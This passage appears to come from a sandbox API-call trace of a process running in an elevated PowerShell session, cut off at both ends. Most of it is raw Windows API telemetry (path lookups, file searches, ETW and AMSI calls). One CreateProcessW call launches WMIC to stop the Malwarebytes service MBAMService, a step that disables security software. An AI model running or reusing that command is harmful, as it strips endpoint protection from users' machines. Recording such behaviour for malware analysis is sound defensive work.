nBufferLength=0xb, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS", lpFilePart=0x0) returned 0xa [0306.443] FindFirstFileW (in: lpFileName="C:\\WINDOWS\\wmic.*", lpFindFileData=0x8b0e58c | out: lpFindFileData=0x8b0e58c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0306.443] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e804) returned 1 [0306.443] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e810) returned 1 [0306.443] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x19 [0306.443] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem", nBufferLength=0x19, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0306.443] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e7e8) returned 1 [0306.443] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0x8b0e864 | out: lpFileInformation=0x8b0e864*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1856002a, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xb288124d, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xb288124d, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x8000)) returned 1 [0306.443] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e7e4) returned 1 [0306.443] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e864) returned 1 [0306.443] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x19 [0306.443] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem", nBufferLength=0x19, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0306.443] FindFirstFileW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem\\wmic.*", lpFindFileData=0x8b0e58c | out: lpFindFileData=0x8b0e58c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fc58640, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x6fc58640, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x6fc58640, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x5ec00, dwReserved0=0x0, dwReserved1=0x0, cFileName="WMIC.exe", cAlternateFileName="")) returned 0x7e1cae0 [0306.444] FindNextFileW (in: hFindFile=0x7e1cae0, lpFindFileData=0x8b0e57c | out: lpFindFileData=0x8b0e57c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0306.444] FindClose (in: hFindFile=0x7e1cae0 | out: hFindFile=0x7e1cae0) returned 1 [0306.444] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e804) returned 1 [0306.444] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e810) returned 1 [0306.444] GetFileAttributesW (lpFileName="C:\\WINDOWS\\System32\\Wbem\\WMIC.exe" (normalized: "c:\\windows\\system32\\wbem\\wmic.exe")) returned 0x20 [0306.444] EtwEventActivityIdControl (in: ControlCode=0x3, ActivityId=0x8b0eafc*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0eafc*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xb3, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0306.445] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x8b0ea68*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0ea68*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xb2, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0306.445] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x8b0eaec*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xb3, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x8b0eaec*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xb3, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0306.445] SHGetFileInfoW (in: pszPath="C:\\WINDOWS\\System32\\Wbem\\WMIC.exe", dwFileAttributes=0x0, psfi=0x8b0e644, cbFileInfo=0x2b4, uFlags=0x2000 | out: psfi=0x8b0e644) returned 0x4550 [0306.445] GetConsoleWindow () returned 0x302b8 [0306.448] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x8b0e410, nSize=0xbc | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL") returned 0x3a [0306.449] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x8b0e6a0, nSize=0xbc | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL") returned 0x3a [0306.449] CoTaskMemAlloc (cb=0x804) returned 0x7e29450 [0306.449] GetConsoleTitleW (in: lpConsoleTitle=0x7e29450, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x49 [0306.450] CoTaskMemFree (pv=0x7e29450) [0306.450] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\WINDOWS\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%MBAMService%%'\" call stopservice", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\FD1HVy\\Desktop", lpStartupInfo=0x8b0e6c0*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x4caeeec | out: lpCommandLine="\"C:\\WINDOWS\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%MBAMService%%'\" call stopservice", lpProcessInformation=0x4caeeec*(hProcess=0x920, hThread=0x91c, dwProcessId=0xec, dwThreadId=0x3e0)) returned 1 [0306.462] CloseHandle (hObject=0x91c) returned 1 [0306.462] SHGetFileInfoW (in: pszPath="C:\\WINDOWS\\System32\\Wbem\\WMIC.exe", dwFileAttributes=0x0, psfi=0x8b0e680, cbFileInfo=0x2b4, uFlags=0x2000 | out: psfi=0x8b0e680) returned 0x4550 [0306.463] GetCurrentProcess () returned 0xffffffff [0306.463] GetCurrentProcess () returned 0xffffffff [0306.463] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x920, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x8b0e904, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x8b0e904*=0x91c) returned 1 [0306.463] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x8b0e8fc*=0x91c, lpdwindex=0x8b0e71c | out: lpdwindex=0x8b0e71c) returned 0x0 [0307.971] CloseHandle (hObject=0x91c) returned 1 [0307.971] GetExitCodeProcess (in: hProcess=0x920, lpExitCode=0x8b0e968 | out: lpExitCode=0x8b0e968*=0x0) returned 1 [0307.971] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1 [0307.977] CloseHandle (hObject=0x920) returned 1 [0307.977] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x8b0ea8c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0ea8c*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xb3, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0307.977] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x8b0edf8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0edf8*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xb3, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0307.977] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xb1, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xb1, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0307.977] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x8b0edf8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0edf8*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xb1, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0307.977] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xb2, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xb2, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0307.977] SetEvent (hEvent=0x900) returned 1 [0307.977] SetEvent (hEvent=0x8f0) returned 1 [0307.977] SetEvent (hEvent=0x8fc) returned 1 [0307.977] SetEvent (hEvent=0x8f8) returned 1 [0307.977] SetEvent (hEvent=0x910) returned 1 [0307.977] SetEvent (hEvent=0x904) returned 1 [0307.978] SetEvent (hEvent=0x908) returned 1 [0307.978] SetEvent (hEvent=0x90c) returned 1 [0307.978] SetEvent (hEvent=0x918) returned 1 [0307.978] SetEvent (hEvent=0x914) returned 1 [0307.978] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x8b0ef8c*=0x84c, lpdwindex=0x8b0edac | out: lpdwindex=0x8b0edac) returned 0x0 [0307.981] SetThreadUILanguage (LangId=0x0) returned 0x6f0409 [0307.983] CoCreateGuid (in: pguid=0x8b0edf8 | out: pguid=0x8b0edf8*(Data1=0x8139ba89, Data2=0x12a6, Data3=0x4129, Data4=([0]=0x8e, [1]=0x42, [2]=0xbc, [3]=0xda, [4]=0xa3, [5]=0x91, [6]=0x86, [7]=0x2))) returned 0x0 [0307.983] QueryPerformanceCounter (in: lpPerformanceCount=0x8b0edd8 | out: lpPerformanceCount=0x8b0edd8*=40301740820) returned 1 [0307.983] AmsiOpenSession () returned 0x0 [0307.983] AmsiScanString () returned 0x80070015 [0307.988] QueryPerformanceCounter (in: lpPerformanceCount=0x8b0eda0 | out: lpPerformanceCount=0x8b0eda0*=40302251408) returned 1 [0307.988] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x8b0eb98, nSize=0xbc | out: lpBuffer="ҳ") returned 0x0 [0307.988] EtwEventActivityIdControl (in: ControlCode=0x3, ActivityId=0x8b0ee68*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0ee68*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xb9, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0307.988] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x8b0edd4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0edd4*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xb2, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0307.988] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xb9, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xb9, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0307.988] EtwEventActivityIdControl (in: ControlCode=0x3, ActivityId=0x8b0ee68*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0ee68*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xba, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0307.988] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x8b0edd4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0edd4*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xb9, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0307.988] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xba, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xba, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0307.989] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x8b0e7a0, nSize=0xbc | out: lpBuffer="ሰғ徠玤") returned 0x0 [0307.989] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x8b0e6bc, nSize=0xbc | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0307.989] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x8b0e6a8, nSize=0xbc | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL") returned 0x3a [0307.989] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x8770c8 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0307.989] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x8b0e6b0, nSize=0xbc | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL") returned 0x3a [0307.989] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x24 [0307.990] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x24, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23 [0307.990] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e7e8) returned 1 [0307.990] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath" (normalized: "c:\\programdata\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0x8b0e864 | out: lpFileInformation=0x8b0e864*(dwFileAttributes=0x2410, ftCreationTime.dwLowDateTime=0xac5d590c, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xac5d590c, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xac5d590c, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0307.990] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e7e4) returned 1 [0307.990] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e864) returned 1 [0307.990] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x24 [0307.990] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x24, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23 [0307.990] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\wmic.*", lpFindFileData=0x8b0e58c | out: lpFindFileData=0x8b0e58c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0307.990] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e804) returned 1 [0307.990] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e810) returned 1 [0307.991] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x14 [0307.992] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32", nBufferLength=0x14, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32", lpFilePart=0x0) returned 0x13 [0307.992] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e7e8) returned 1 [0307.992] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x8b0e864 | out: lpFileInformation=0x8b0e864*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6ec28c54, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0xebb5ab66, ftLastAccessTime.dwHighDateTime=0x1d5d810, ftLastWriteTime.dwLowDateTime=0xebb5ab66, ftLastWriteTime.dwHighDateTime=0x1d5d810, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1 [0307.992] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e7e4) returned 1 [0307.992] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e864) returned 1 [0307.992] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x14 [0307.992] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32", nBufferLength=0x14, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32", lpFilePart=0x0) returned 0x13 [0307.992] FindFirstFileW (in: lpFileName="C:\\WINDOWS\\system32\\wmic.*", lpFindFileData=0x8b0e58c | out: lpFindFileData=0x8b0e58c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0307.993] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e804) returned 1 [0307.993] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e810) returned 1 [0307.993] GetFullPathNameW (in: lpFileName="C:\\WINDOWS", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0xb [0307.993] GetFullPathNameW (in: lpFileName="C:\\WINDOWS", nBufferLength=0xb, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS", lpFilePart=0x0) returned 0xa [0307.993] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e7e8) returned 1 [0307.993] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x8b0e864 | out: lpFileInformation=0x8b0e864*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0xc838b81d, ftLastAccessTime.dwHighDateTime=0x1d41dc3, ftLastWriteTime.dwLowDateTime=0xc838b81d, ftLastWriteTime.dwHighDateTime=0x1d41dc3, nFileSizeHigh=0x0, nFileSizeLow=0x7000)) returned 1 [0307.993] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e7e4) returned 1 [0307.993] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e864) returned 1 [0307.993] GetFullPathNameW (in: lpFileName="C:\\WINDOWS", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0xb [0307.993] GetFullPathNameW (in: lpFileName="C:\\WINDOWS", nBufferLength=0xb, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS", lpFilePart=0x0) returned 0xa [0307.993] FindFirstFileW (in: lpFileName="C:\\WINDOWS\\wmic.*", lpFindFileData=0x8b0e58c | out: lpFindFileData=0x8b0e58c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0307.994] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e804) returned 1 [0307.994] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e810) returned 1 [0307.994] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x19 [0307.994] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem", nBufferLength=0x19, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0307.994] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e7e8) returned 1 [0307.994] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0x8b0e864 | out: lpFileInformation=0x8b0e864*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1856002a, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xb288124d, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xb288124d, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x8000)) returned 1 [0307.994] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e7e4) returned 1 [0307.994] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e864) returned 1 [0307.994] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x19 [0307.994] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem", nBufferLength=0x19, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0307.994] FindFirstFileW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem\\wmic.*", lpFindFileData=0x8b0e58c | out: lpFindFileData=0x8b0e58c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fc58640, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x6fc58640, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x6fc58640, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x5ec00, dwReserved0=0x0, dwReserved1=0x0, cFileName="WMIC.exe", cAlternateFileName="")) returned 0x7e1c620 [0307.994] FindNextFileW (in: hFindFile=0x7e1c620, lpFindFileData=0x8b0e57c | out: lpFindFileData=0x8b0e57c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", 